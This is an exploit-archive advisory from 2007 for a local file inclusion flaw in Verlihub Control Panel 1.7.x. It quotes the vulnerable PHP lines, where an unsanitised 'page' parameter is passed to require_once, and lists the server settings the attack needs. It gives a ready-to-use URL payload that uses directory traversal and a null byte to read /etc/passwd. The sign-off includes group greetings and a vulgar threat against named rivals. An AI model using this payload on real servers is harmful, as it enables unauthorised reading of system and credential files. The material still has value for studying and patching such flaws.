[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Verlihub Control Panel <= 1.7.x Local File Inclusion Vulnerability
# Published : 2007-10-07
# Author : TEAMELITE
# Previous Title : Softbiz Jobs & Recruitment Remote SQL Injection Vulnerability
# Next Title : idmos-phoenix cms (aural.php) Remote File Inclusion Vulnerability
#####################################################################################
#Verlihub Control Panel v 1.7 PHP 4.x Local File Inclusion
#http://vhcp.verlihub- project.org/
#
#Bug Found By Methodman
#From TEAMELITE <-> dchub.nemesis.te-home.net:4120
#####################################################################################
#Bug:
#Line: 27 - ini_set("magic_quotes_gpc","1"); ............................ Line: 71 - $page_name =
#isset($_GET['page']) ? $_GET['page'] : (!isset($_SESSION['verliadmin']) ? 'start' : 'start'); .....Line: 145 - #require_once("./pages/$page_name.php");
#####################################################################################
#NEED: magic_quotes=OFF
#
#NEED: disable_functions=ini_set
#####################################################################################
#
#Exploit:
#
#http://site/path/?page=../../../../../../../../etc/passwd%00
#
#
#####################################################################################
#
#Gr33tZ: To All Members Of TEAMELITE
# Ashura,Lord_Zero,Meka][Meka,Ne0
# AND
# My Friend Elekt From Antichat.
#####################################################################################
#My 3N3mY ?: ...Mish and Dark If Y0u FUck w1t me,I'll pUt my f00t in y0ur aSs !...
#####################################################################################
# www.Syue.com [2007-10-07]